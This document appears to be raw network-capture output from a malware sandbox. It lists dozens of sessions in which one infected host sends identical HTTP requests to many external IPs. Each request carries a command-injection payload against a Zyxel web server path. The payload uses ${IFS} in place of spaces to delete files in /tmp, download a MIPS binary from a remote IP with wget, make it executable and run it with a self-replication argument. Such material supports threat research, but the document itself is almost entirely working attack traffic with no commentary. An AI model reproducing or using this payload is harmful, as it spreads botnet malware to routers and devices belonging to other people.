                                                Jan 28, 2024 10:16:36.990005016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7383192.168.2.235857675.154.109.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990035057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7384192.168.2.235949440.172.202.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990073919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7385192.168.2.2342126118.51.56.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990098000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7386192.168.2.2358452163.24.75.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990165949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7387192.168.2.2339168201.6.140.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990185976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7388192.168.2.233432674.164.238.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990204096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7389192.168.2.235900451.3.208.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990261078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7390192.168.2.233418438.102.186.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990273952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7391192.168.2.233660287.117.34.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990291119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7392192.168.2.235545047.231.105.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990329981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7393192.168.2.2350638109.142.22.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990346909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7394192.168.2.2335858154.245.128.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990362883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7395192.168.2.2341202101.60.152.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990395069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7396192.168.2.233498080.179.14.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990431070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7397192.168.2.2336998211.29.149.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990458012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7398192.168.2.2349018116.92.179.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990484953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7399192.168.2.2335162100.130.248.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990519047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7400192.168.2.2336946122.137.101.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990525007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7401192.168.2.233869253.199.143.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990564108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7402192.168.2.2351974141.138.138.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990583897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7403192.168.2.2351732183.158.63.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990591049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7404192.168.2.235844443.109.204.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990614891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7405192.168.2.2357472125.227.142.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990653992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7406192.168.2.2347654188.75.101.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990696907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7407192.168.2.2354754149.210.16.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990717888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7408192.168.2.23406721.113.253.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990734100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7409192.168.2.235501832.88.58.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990771055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7410192.168.2.235287425.153.121.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990792036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7411192.168.2.2337578171.192.12.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990819931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7412192.168.2.2337430108.25.231.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990843058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7413192.168.2.234886269.46.203.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990880966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7414192.168.2.2347642145.65.13.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990896940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7415192.168.2.233964052.140.95.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990906954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7416192.168.2.235946470.160.224.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990938902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7417192.168.2.236007423.150.212.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990972996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7418192.168.2.2357846141.82.187.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.990993977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7419192.168.2.2336664218.226.251.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991029024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7420192.168.2.2341284190.174.69.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991055965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7421192.168.2.2357738178.237.84.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991087914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7422192.168.2.235817234.163.105.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991103888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7423192.168.2.2354492189.9.53.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991132975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7424192.168.2.234662239.37.39.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991166115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7425192.168.2.2356964195.221.232.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991189003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7426192.168.2.2347456155.108.162.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991216898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7427192.168.2.235852048.35.200.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991246939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7428192.168.2.2333578159.223.54.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991270065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7429192.168.2.23556349.16.31.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991300106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7430192.168.2.2351128111.202.226.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991352081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7431192.168.2.2357358129.40.231.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991358042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7432192.168.2.2352106160.163.170.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991405010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7433192.168.2.2352952117.55.26.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991420984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7434192.168.2.235754219.100.214.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991460085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7435192.168.2.234896631.66.143.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991485119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7436192.168.2.2334206135.235.224.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991492033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7437192.168.2.2347436178.54.132.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991511106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7438192.168.2.2347144120.239.253.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991525888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7439192.168.2.2357172188.254.69.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991575956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7440192.168.2.2359446116.40.75.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991601944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7441192.168.2.234964258.159.68.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991626024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7442192.168.2.2342564161.22.81.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991674900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7443192.168.2.2356428153.9.120.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:36.991699934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7444192.168.2.23343225.36.48.192443
                                                TimestampBytes transferredDirectionData
